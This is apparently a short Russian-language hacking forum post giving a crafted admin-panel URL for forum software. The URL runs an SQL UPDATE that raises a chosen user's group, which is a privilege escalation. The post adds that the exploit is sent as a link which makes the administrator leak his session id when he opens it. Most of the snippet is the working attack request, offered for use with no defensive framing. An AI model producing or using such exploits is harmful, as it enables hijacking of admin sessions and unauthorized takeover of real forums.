/admin/index.php?adsess=(тут id админской сессии)&act=sql&code=runsql&section=admin&qu ery=UPDATE+(тут префикс базы)members+SET
+mgroup+%3D+%27(тут номер группы до которой поднимать)%27+WHERE+id+%3D+%27(здесь id юзера, которого хотим повысить)%27&st=

Проблема в том, что нет админской сессии. Если достанешь - можешь вручную делать много чего
Чтобы достать админскую сессию и написан данный сплоит в виде ссылки, попадая на которую администратор "палит" свою сессию